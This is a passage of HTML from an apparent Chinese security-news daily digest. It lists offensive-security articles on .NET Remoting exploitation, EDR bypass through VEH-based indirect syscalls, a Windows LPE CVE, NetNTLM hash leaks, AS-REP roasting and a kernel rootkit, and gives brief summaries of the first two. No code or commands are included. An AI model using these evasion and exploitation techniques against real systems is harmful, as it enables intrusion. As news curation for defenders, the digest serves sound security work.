monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">浅读预览</code><br/>
			3. 机读为主，人工辅助，每日数万网站，10w推特速读<br/>
			4. 推送可能<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">大众或小众</code>，不代表本人偏好或认可<br/>
			5. 因渲染和外链原因，公众号<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">甲方安全建设</code>发送<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">日报</code>或日期,如<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">20240805</code>获取<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">图文评论版pdf</code></p></blockquote><h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">目录</span></h3><blockquote style="margin-top: 20px;margin-bottom: 20px;padding: 10px 10px 10px 20px;border-top: 3px none rgba(0, 0, 0, 0.4);border-bottom: 3px none rgba(0, 0, 0, 0.4);border-right: 3px solid rgba(0, 150, 136, 0.3);border-left-color: rgb(0, 150, 136);border-radius: 0px;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgba(0, 0, 0, 0.05);width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;overflow: auto;"><span style="display: none;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.5em;letter-spacing: 0em;"></span><p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(119, 119, 119);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">0x01 【2024-0731】向旧的 .NET Remoting 传授新的利用技巧<br/>0x02 【2024-0801】利用VEH绕过EDR：LayeredSyscall技术解析<br/>0x03 【2024-0802】Windows AppLocker驱动LPE漏洞CVE-2024-21338<br/>0x04 【2024-0802】基于Python的445/tcp端口接管技术<br/>0x05 【2024-0802】审计Atlassian插件：53个零日漏洞后的反思<br/>0x06 【2024-0802】Homebrew安全审计发现潜在风险<br/>0x07 【2024-0803】突破极限：通过首次序列同步扩展单包竞态条件以打破65,535字节限制<br/>0x08 【2024-0803】“假”土豆病毒的解析——解码器博客<br/>0x09 【2024-0805】利用RustPatchlessCLRLoader绕过Windows安全机制加载.NET程序集<br/>0x0a 【2024-0805】泄露壁纸工具利用漏洞泄露用户NetNTLM哈希<br/>0x0b 【2024-0805】Kerberos安全：红蓝队攻防策略之AS_REP Roasting<br/>0x0c 【2024-0805】使用Rust语言开发的Windows内核Rootkit项目（shadow-rs）<br/></p></blockquote>
	<h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x01
			 向旧的 .NET Remoting 传授新的利用技巧</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">本文详细探讨了三种用于攻击硬化的 .NET Remoting 服务器的漏洞利用技术，即使在启用了 TypeFilterLevel.Low 和代码访问安全性（CAS）限制的情况下。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.10251046025104603" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="956" src="https://wechat2rss.xlab.app/img-proxy/?k=df4543cc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkIWNibegTVbjl4P8oUnsxdsxqqulahibXbylpsbmNWKlSOO4lowBTgicsBWmHTdxECAjHPlAHBGnKbQ%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.5220061412487206" data-w="977" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=ef477154&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkIWNibegTVbjl4P8oUnsxds85ZnOBZ1vOyicdLC5bYibaA2evSTV3a87bPTILtiaGclRe3Xdwm1BSPibA%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.5220061412487206" data-w="977" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=adfdd4d6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkIWNibegTVbjl4P8oUnsxdsblMK9e7TM1FxGVQHEU2Zwia03cELwC6Zc3pFClSWrkXH4GhTxVDMP5A%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">「编者注」:赛博考古之 .NET Remoting</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">老牌 .NET 远程调用技术的新漏洞利用技巧</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZkIWNibegTVbjl4P8oUnsxdsia17U8TyyVb2jfwD2ERNBO3SEKDPbiaLtqiaXtrtMibdERVc9ibcLOO42iaw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZkIWNibegTVbjl4P8oUnsxdsia17U8TyyVb2jfwD2ERNBO3SEKDPbiaLtqiaXtrtMibdERVc9ibcLOO42iaw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4844148818212458"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">.NET Remoting 仍然存在未被充分探索的安全漏洞。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">即使在严格的安全限制下，也存在绕过 CAS 限制的方法。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">通过深入理解 .NET Remoting 的工作原理，可以发现新的利用技术。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">安全研究人员应该持续关注和研究看似已经过时的技术，因为它们可能仍然存在未知的安全风险。</section></li></ul>
	<br/>
	<p>🏷️: 黑客技术, 网络安全, .NET Remoting, 代码访问安全</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x02
			 利用VEH绕过EDR：LayeredSyscall技术解析</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">本文介绍了一种利用 Vectored Exception Handling (VEH) 机制来欺骗 EDR 产品并执行间接系统调用的方法，从而实现恶意行为而不被检测。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.6103515625" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1024" src="https://wechat2rss.xlab.app/img-proxy/?k=05fc1476&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkIWNibegTVbjl4P8oUnsxdsPGwJGH1xvZPsz6Vm5syE7ib3LSczD6WSqJfKwrRWqJicRibWU8T5pM87A%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.18395303326810175" data-w="1022" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=52a35a3e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkIWNibegTVbjl4P8oUnsxdsasib3ru9ePvfBrGOu14r21plfDMDOfCr30YrbzBYQtCTpAZRkmo2Yjw%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.1904296875" data-w="1024" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=d3378853&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkIWNibegTVbjl4P8oUnsxdsLefBgO3p8LsY9rmhLyDrtMHNrnBuic9vJSGzF79qlJChuNWibO5gpwyA%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">利用VEH和间接系统调用构建合法调用栈</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">LayeredSyscall: 利用VEH绕过EDR技术</section></li></ul>
	<section>
